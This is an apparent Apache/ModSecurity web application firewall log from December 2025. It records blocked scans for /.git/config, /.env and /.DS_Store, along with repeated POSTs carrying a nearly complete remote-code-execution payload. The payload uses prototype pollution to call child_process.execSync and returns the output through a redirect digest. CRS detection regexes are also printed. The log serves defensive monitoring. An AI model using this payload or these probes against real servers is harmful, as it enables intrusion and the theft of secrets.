[Thu Dec 18 06:21:50.864801 2025] [:error] [pid 813370] [client 157.230.19.140:47622] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOPbr4E__wGzptGHint1QAAAAg"]
[Thu Dec 18 06:21:50.865062 2025] [:error] [pid 813370] [client 157.230.19.140:47622] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOPbr4E__wGzptGHint1QAAAAg"]
[Thu Dec 18 06:21:50.865237 2025] [:error] [pid 813370] [client 157.230.19.140:47622] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOPbr4E__wGzptGHint1QAAAAg"]
[Thu Dec 18 07:58:07.949274 2025] [authz_core:error] [pid 813018] [client 139.59.136.184:55828] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Dec 18 07:58:10.949026 2025] [:error] [pid 813359] [client 139.59.136.184:46754] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOmArjsQ2OAT5oMPR4uUgAAAAc"]
[Thu Dec 18 07:58:10.949259 2025] [:error] [pid 813359] [client 139.59.136.184:46754] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOmArjsQ2OAT5oMPR4uUgAAAAc"]
[Thu Dec 18 07:58:10.949415 2025] [:error] [pid 813359] [client 139.59.136.184:46754] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOmArjsQ2OAT5oMPR4uUgAAAAc"]
[Thu Dec 18 07:58:11.958357 2025] [:error] [pid 813020] [client 139.59.136.184:46758] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOmAwYcu7B8Gvtr6mOgJQAAAAQ"]
[Thu Dec 18 07:58:11.958606 2025] [:error] [pid 813020] [client 139.59.136.184:46758] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOmAwYcu7B8Gvtr6mOgJQAAAAQ"]
[Thu Dec 18 07:58:11.958786 2025] [:error] [pid 813020] [client 139.59.136.184:46758] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOmAwYcu7B8Gvtr6mOgJQAAAAQ"]
[Thu Dec 18 07:58:13.999581 2025] [:error] [pid 813019] [client 139.59.136.184:46770] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOmBTZTDxRxH4PwP3ShOQAAAAM"]
[Thu Dec 18 07:58:13.999804 2025] [:error] [pid 813019] [client 139.59.136.184:46770] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOmBTZTDxRxH4PwP3ShOQAAAAM"]
[Thu Dec 18 07:58:13.999950 2025] [:error] [pid 813019] [client 139.59.136.184:46770] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOmBTZTDxRxH4PwP3ShOQAAAAM"]
[Thu Dec 18 08:05:27.605434 2025] [:error] [pid 813359] [client 98.91.238.131:37778] [client 98.91.238.131] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUOnt7jsQ2OAT5oMPR4uXQAAAAc"]
[Thu Dec 18 08:05:27.605937 2025] [:error] [pid 813359] [client 98.91.238.131:37778] [client 98.91.238.131] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUOnt7jsQ2OAT5oMPR4uXQAAAAc"]
[Thu Dec 18 08:05:27.606868 2025] [:error] [pid 813359] [client 98.91.238.131:37778] [client 98.91.238.131] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUOnt7jsQ2OAT5oMPR4uXQAAAAc"]
[Thu Dec 18 08:05:27.607045 2025] [:error] [pid 813359] [client 98.91.238.131:37778] [client 98.91.238.131] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUOnt7jsQ2OAT5oMPR4uXQAAAAc"]
[Thu Dec 18 10:29:16.828701 2025] [:error] [pid 818375] [client 98.91.238.131:38780] [client 98.91.238.131] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPJbLQ9r8SVzp6kU-ngUQAAAAo"]
[Thu Dec 18 10:29:16.829173 2025] [:error] [pid 818375] [client 98.91.238.131:38780] [client 98.91.238.131] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPJbLQ9r8SVzp6kU-ngUQAAAAo"]
[Thu Dec 18 10:29:16.830569 2025] [:error] [pid 818375] [client 98.91.238.131:38780] [client 98.91.238.131] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPJbLQ9r8SVzp6kU-ngUQAAAAo"]
[Thu Dec 18 10:29:16.830795 2025] [:error] [pid 818375] [client 98.91.238.131:38780] [client 98.91.238.131] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPJbLQ9r8SVzp6kU-ngUQAAAAo"]
[Thu Dec 18 12:03:51.996956 2025] [:error] [pid 813370] [client 35.174.8.115:59600] [client 35.174.8.115] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPfl74E__wGzptGHinuEwAAAAg"]
[Thu Dec 18 12:03:51.997480 2025] [:error] [pid 813370] [client 35.174.8.115:59600] [client 35.174.8.115] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPfl74E__wGzptGHinuEwAAAAg"]
[Thu Dec 18 12:03:51.998704 2025] [:error] [pid 813370] [client 35.174.8.115:59600] [client 35.174.8.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPfl74E__wGzptGHinuEwAAAAg"]
[Thu Dec 18 12:03:51.998906 2025] [:error] [pid 813370] [client 35.174.8.115:59600] [client 35.174.8.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPfl74E__wGzptGHinuEwAAAAg"]
[Thu Dec 18 12:24:36.851045 2025] [:error] [pid 818374] [client 3.81.93.150:59874] [client 3.81.93.150] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPkdD8970_eqArficx74QAAAAk"]
[Thu Dec 18 12:24:36.851525 2025] [:error] [pid 818374] [client 3.81.93.150:59874] [client 3.81.93.150] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPkdD8970_eqArficx74QAAAAk"]
[Thu Dec 18 12:24:36.852451 2025] [:error] [pid 818374] [client 3.81.93.150:59874] [client 3.81.93.150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPkdD8970_eqArficx74QAAAAk"]
[Thu Dec 18 12:24:36.852611 2025] [:error] [pid 818374] [client 3.81.93.150:59874] [client 3.81.93.150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUPkdD8970_eqArficx74QAAAAk"]
[Thu Dec 18 13:32:47.417308 2025] [:error] [pid 813359] [client 54.224.163.42:45196] [client 54.224.163.42] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUP0b7jsQ2OAT5oMPR4uhwAAAAc"]
[Thu Dec 18 13:32:47.417774 2025] [:error] [pid 813359] [client 54.224.163.42:45196] [client 54.224.163.42] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUP0b7jsQ2OAT5oMPR4uhwAAAAc"]
[Thu Dec 18 13:32:47.418823 2025] [:error] [pid 813359] [client 54.224.163.42:45196] [client 54.224.163.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aUP0b7jsQ2OAT5oMPR4uhwAAAAc"]
